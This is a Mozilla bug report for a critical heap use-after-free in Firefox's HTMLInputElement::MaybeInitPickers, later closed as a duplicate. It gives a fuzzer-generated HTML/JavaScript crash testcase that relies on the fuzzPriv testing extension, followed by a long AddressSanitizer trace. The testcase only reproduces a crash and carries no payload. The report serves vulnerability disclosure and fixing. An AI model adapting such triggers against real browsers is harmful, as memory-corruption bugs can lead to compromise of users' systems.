Closed
Bug 1378110
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in mozilla::dom::HTMLInputElement::MaybeInitPickers
Categories
(Core :: DOM: Events, defect)
Core
DOM: Events
Tracking
()
RESOLVED
DUPLICATE
of bug 1371259
People
(Reporter: nils, Assigned: masayuki)
Details
(Keywords: csectype-uaf, reporter-external, sec-critical)
Attachments
(3 files)
|
877 bytes,
text/html
|
Details | |
|
26.61 KB,
text/plain
|
Details | |
|
1.03 KB,
patch
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170703081455). The testcase requires the fuzzPriv extension
<script>
function start() {
o13=document.createElementNS('http://www.w3.org/1999/xhtml','input');
o13.setAttribute('oninput','window.top.fun1(this)');
o13.type='range';
o206=document.documentElement;
o214=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
o214.src='data:text/html,<div>';
o214.addEventListener('load', fun0,false);
document.documentElement.appendChild(o214);
}
function fun0 () {
o261=o214.contentDocument.documentElement;
o261.appendChild(o13);
fuzzPriv.trustedKeyEvent(o13,'press',false,false,true,false,36,0);
}
function fun1() {
o326=document.createElementNS('http://www.w3.org/1999/xhtml','li');
o326.appendChild(o206);
x = new XMLHttpRequest();
x.open('POST','https://www.mozilla.org',false);
try{x.send("X");}catch(e){}
fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==3981==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000283638 at pc 0x7f7876697a6f bp 0x7ffe555ccbb0 sp 0x7ffe555ccba8
READ of size 4 at 0x611000283638 thread T0 (Web Content)
#0 0x7f7876697a6e in DefaultPrevented /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:194:12
#1 0x7f7876697a6e in DefaultPrevented /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:467
#2 0x7f7876697a6e in mozilla::dom::HTMLInputElement::MaybeInitPickers(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:4206
#3 0x7f787669aa6d in mozilla::dom::HTMLInputElement::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:4740:10
#4 0x7f78763e38b7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:415:12
#5 0x7f78763e38b7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:467
#6 0x7f78763e3e3c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:517:5
#7 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#8 0x7f78763b605a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:893:12
#9 0x7f787472a141 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1343:5
#10 0x7f787640eed4 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:80:9
#11 0x7f7875b915a2 in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle<JSObject*>, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:974:21
#12 0x7f7875b8e9d0 in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1150:13
#13 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#14 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#15 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#16 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#17 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#18 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#19 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#20 0x7f787cebaf93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
#21 0x7f78732462fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#23 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#24 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#25 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#26 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#27 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#28 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#29 0x7f787cebce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#30 0x7f7875ab1467 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7f787640177f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#32 0x7f787640177f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1139
#33 0x7f7876403692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
#34 0x7f78763e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
#35 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#36 0x7f787430abe0 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3999:7
#37 0x7f78763e38b7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:415:12
#38 0x7f78763e38b7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:467
#39 0x7f78763e3e3c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:517:5
#40 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#41 0x7f787863e94f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7
#42 0x7f787b58df3a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7698:21
#43 0x7f787b589f98 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7496:7
#44 0x7f787b59150f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7393:13
#45 0x7f7873518a22 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1299:3
#46 0x7f7873517a1c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:860:14
#47 0x7f7873514868 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:749:9
#48 0x7f7873516732 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:631:5
#49 0x7f787351745c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:487:14
#50 0x7f7871c06ce3 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#51 0x7f7874667a9b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8922:18
#52 0x7f7874667662 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8844:9
#53 0x7f7874641175 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5365:3
#54 0x7f7874703662 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1138:12
#55 0x7f7874703662 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1144
#56 0x7f7874703662 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1187
#57 0x7f7871a391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
#58 0x7f7871a65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
#59 0x7f7871a6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
#60 0x7f787284a1f1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#61 0x7f78727a6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
#62 0x7f78727a6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
#63 0x7f78727a6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
#64 0x7f7877e4ca6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#65 0x7f787c07fa47 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
#66 0x7f78727a6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
#67 0x7f78727a6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
#68 0x7f78727a6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
#69 0x7f787c07f4ad in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
#70 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
#71 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
#72 0x7f788ec1a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
#73 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)
0x611000283638 is located 56 bytes inside of 248-byte region [0x611000283600,0x6110002836f8)
freed by thread T0 (Web Content) here:
#0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7f78763ecdac in mozilla::dom::Event::~Event() /home/worker/workspace/build/src/dom/events/Event.cpp:132:5
#2 0x7f7876450b52 in ~UIEvent /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/UIEvent.h:97:15
#3 0x7f7876450b52 in mozilla::dom::KeyboardEvent::~KeyboardEvent() /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/KeyboardEvent.h:76
#4 0x7f7871909717 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25
#5 0x7f787191069b in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2849:3
#6 0x7f787191069b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3851
#7 0x7f787190fbb3 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3672:9
#8 0x7f7871913990 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4209:21
#9 0x7f7874743972 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1693:3
#10 0x7f78742a99ed in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1401:3
#11 0x7f7871a85371 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
#12 0x7f787331e2cb in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
#13 0x7f787331e2cb in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
#14 0x7f787331e2cb in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
#15 0x7f787332537f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:966:12
#16 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#17 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#18 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#19 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#20 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#21 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#22 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#23 0x7f787cebaf93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
#24 0x7f78732462fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#25 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#26 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#27 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#28 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#29 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#30 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#31 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#32 0x7f787d19624e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
#33 0x7f787d15a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
#34 0x7f787d1763d3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
#35 0x7f787d178da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
#36 0x7f787c545b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#37 0x7f787c545b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
#38 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#39 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
previously allocated by thread T0 (Web Content) here:
#0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f7876439f93 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f7876439f93 in mozilla::dom::KeyboardEvent::KeyboardEvent(mozilla::dom::EventTarget*, nsPresContext*, mozilla::WidgetKeyboardEvent*) /home/worker/workspace/build/src/dom/events/KeyboardEvent.cpp:19
#4 0x7f787643e817 in NS_NewDOMKeyboardEvent(mozilla::dom::EventTarget*, nsPresContext*, mozilla::WidgetKeyboardEvent*) /home/worker/workspace/build/src/dom/events/KeyboardEvent.cpp:355:34
#5 0x7f787638d1fa in mozilla::EventDispatcher::CreateEvent(mozilla::dom::EventTarget*, nsPresContext*, mozilla::WidgetEvent*, nsAString const&, mozilla::dom::CallerType) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:990:12
#6 0x7f7874660f62 in nsIDocument::CreateEvent(nsAString const&, mozilla::dom::CallerType, mozilla::ErrorResult&) const /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8017:5
#7 0x7f7875aed089 in mozilla::dom::DocumentBinding::createEvent(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1459:57
#8 0x7f7876048b1e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3028:13
#9 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#10 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#11 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#12 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#13 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#14 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#15 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#16 0x7f787cebaf93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
#17 0x7f78732462fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#18 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#19 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#20 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#21 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#22 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#23 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#24 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#25 0x7f787cebce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#26 0x7f7875ab1467 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#27 0x7f787640177f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#28 0x7f787640177f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1139
#29 0x7f7876403692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
#30 0x7f78763e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
#31 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#32 0x7f787430abe0 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3999:7
#33 0x7f78763e38b7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:415:12
#34 0x7f78763e38b7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:467
#35 0x7f78763e3e3c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:517:5
#36 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:194:12 in DefaultPrevented
Shadow bytes around the buggy address:
0x0c2280048670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2280048680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c2280048690: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c22800486a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c22800486b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=>0x0c22800486c0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
0x0c22800486d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c22800486e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c22800486f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2280048700: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c2280048710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
